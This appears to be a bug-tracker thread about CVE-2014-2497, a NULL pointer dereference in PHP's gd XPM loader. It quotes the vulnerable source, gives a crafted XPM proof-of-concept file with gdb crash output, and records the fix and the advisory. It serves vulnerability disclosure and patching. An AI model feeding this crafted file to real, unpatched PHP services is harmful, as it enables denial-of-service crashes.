From ${URL} : Description: ------------ php-gd <= v5.4.17-2 'c_color' NULL pointer dereference so the bug is triggered in gdImageCreateFromXpm() on line 42 of gd/libgd/gdxpm.c: --------------------------------------------------------------------------------- gdImagePtr gdImageCreateFromXpm (char *filename) { XpmInfo info; XpmImage image; int i, j, k, number; char buf[5]; gdImagePtr im = 0; int *pointer; int red = 0, green = 0, blue = 0; int *colors; int ret; ret = XpmReadFileToXpmImage(filename, &image, &info); if (ret != XpmSuccess) { return 0; } if (!(im = gdImageCreate(image.width, image.height))) { goto done; } number = image.ncolors; colors = (int *) safe_emalloc(number, sizeof(int), 0); for (i = 0; i < number; i++) { switch (strlen (image.colorTable[i].c_color)) { // BOOM -------------------------------------------------------------------------------------------------------- The call to strlen() dereferences image.colorTable[i].c_color, which libXpm leaves NULL when the particular color entry uses a different key (such as monochrome/monovisual); the loop performs no NULL check before calling strlen() on it. 
The xpmColorKeys array stores all available keys and can be found in libXpm: ---------------------------------------------------------------------------- const char *xpmColorKeys[] = { "s", /* key #1: symbol */ "m", /* key #2: mono visual */ "g4", /* key #3: 4 grays visual */ "g", /* key #4: gray visual */ "c", /* key #5: color visual */ }; The following xpm file will trigger the bug: -------------------------------------------- /* XPM */ static char * gv_xpm[] = { "13 13 6 1", "A c #FFFFFF " /* "0" */, "B c #CCCCCC " /* "0.0399" */, "C c #999999 " /* "0.0798" */, "D m #666666 " /* "0.12" NOTE: this is monochrome/monovisual */, "E c #333333 " /* "0.16" */, "F c #000000 " /* "0.2" */, /* x-axis: 0 40 80 120 160 200 240 280 320 360 400 440 480 */ /* y-axis: 0 40 80 120 160 200 240 280 320 360 400 440 480 */ "FEDDDDCCCCCBA", "FEDDDCCCCBBAB", --------------------------------------------- POC: php > imagecreatefromxpm("monochome-poc.xpm"); (gdb) p colorTable[0] $2 = {string = 0x7fa6cec524c0 "A", symbolic = 0x0, m_color = 0x0, g4_color = 0x0, g_color = 0x0, c_color = 0x7fa6cec58650 "#FFFFFF"} (gdb) p colorTable[1] $3 = {string = 0x7fa6cec58670 "B", symbolic = 0x0, m_color = 0x0, g4_color = 0x0, g_color = 0x0, c_color = 0x7fa6cec58690 "#CCCCCC"} (gdb) p colorTable[2] $4 = {string = 0x7fa6cec586b0 "C", symbolic = 0x0, m_color = 0x0, g4_color = 0x0, g_color = 0x0, c_color = 0x7fa6cec586d0 "#999999"} (gdb) p colorTable[3] $5 = {string = 0x7fa6cec586f0 "D", symbolic = 0x0, m_color = 0x7fa6cec58710 "#666666", g4_color = 0x0, g_color = 0x0, c_color = 0x0} (gdb) p colorTable[4] $6 = {string = 0x7fa6cec58730 "E", symbolic = 0x0, m_color = 0x0, g4_color = 0x0, g_color = 0x0, c_color = 0x7fa6cec58750 "#333333"} (gdb) p colorTable[5] $7 = {string = 0x7fa6cec58770 "F", symbolic = 0x0, m_color = 0x0, g4_color = 0x0, g_color = 0x0, c_color = 0x7fa6cec58790 "#000000"} (gdb) c Continuing. Program received signal SIGSEGV, Segmentation fault. 
__strlen_sse2_pminub () at ../sysdeps/x86_64/multiarch/strlen-sse2-pminub.S:39 39 movdqu (%rdi), %xmm1 (gdb) bt #0 __strlen_sse2_pminub () at ../sysdeps/x86_64/multiarch/strlen-sse2-pminub.S:39 #1 0x00007f009474942a in gdImageCreateFromXpm (filename=<optimized out>) at /usr/src/debug/php-5.4.17/ext/gd/libgd/gdxpm.c:42 #2 0x00007f009473d2c2 in _php_image_create_from (ht=<optimized out>, return_value=0x7f00a169be98, image_type=6, tn=0x7f0094753c00 "XPM", func_p=0x7f0094749340 <gdImageCreateFromXpm>, ioctx_func_p=<optimized out>, return_value_used=<optimized out>, this_ptr=<optimized out>, return_value_ptr=<optimized out>) at /usr/src/debug/php-5.4.17/ext/gd/gd.c:2534 #3 0x00007f00a19e5181 in zend_do_fcall_common_helper_SPEC (execute_data=0x7f00a1665060) at /usr/src/debug/php-5.4.17/Zend/zend_vm_execute.h:643 #4 0x00007f00a199f017 in execute (op_array=0x7f00a169acf8) at /usr/src/debug/php-5.4.17/Zend/zend_vm_execute.h:410 #5 0x00007f00a1932976 in zend_eval_stringl (str=str@entry=0x7f00a1699c88 "imagecreatefromxpm(\"0day/zero-day2.xpm\");\n", str_len=str_len@entry=42, retval_ptr=retval_ptr@entry=0x0, string_name=string_name@entry=0x7f00a1a0cbdf "php shell code") at /usr/src/debug/php-5.4.17/Zend/zend_execute_API.c:1197 #6 0x00007f00a181fcdf in readline_shell_run () at /usr/src/debug/php-5.4.17/ext/readline/readline_cli.c:664 #7 0x00007f00a19e78c4 in do_cli (argc=2, argv=0x7ffff35fc268) at /usr/src/debug/php-5.4.17/sapi/cli/php_cli.c:986 #8 0x00007f00a179ea9a in main (argc=2, argv=0x7ffff35fc268) at /usr/src/debug/php-5.4.17/sapi/cli/php_cli.c:1364 Test script: --------------- /* XPM */ static char * gv_xpm[] = { "13 13 6 1", "A c #FFFFFF " /* "0" */, "B c #CCCCCC " /* "0.0399" */, "C c #999999 " /* "0.0798" */, "D m #666666 " /* "0.12" NOTE: this is monochrome/monovisual */, "E c #333333 " /* "0.16" */, "F c #000000 " /* "0.2" */, /* x-axis: 0 40 80 120 160 200 240 280 320 360 400 440 480 */ /* y-axis: 0 40 80 120 160 200 240 280 320 360 400 440 480 */ "FEDDDDCCCCCBA", 
"FEDDDCCCCBBAB", Expected result: ---------------- php > print imagecreatefromxpm("monochome-poc.xpm")."\n"; Resource id #4 php > Actual result: -------------- php > print imagecreatefromxpm("monochome-poc.xpm")."\n"; Segmentation fault (core dumped) @maintainer(s): after the bump, in case we need to stabilize the package, please let us know whether it is ready for stabilization.
Is this bug covered by the fix in the PHP version currently (or previously) being stabilized?
This is fixed in 5.5.16 and 5.4.32, which are currently in stabilization in bug 513032.
CVE-2014-2497 (http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2497): The gdImageCreateFromXpm function in gdxpm.c in libgd, as used in PHP 5.4.26 and earlier, allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) via a crafted color table in an XPM file.
Stabilized and cleaned up; adding to the existing GLSA.
This issue was resolved and addressed in GLSA 201408-11 at http://security.gentoo.org/glsa/glsa-201408-11.xml by GLSA coordinator Kristian Fiskerstrand (K_F).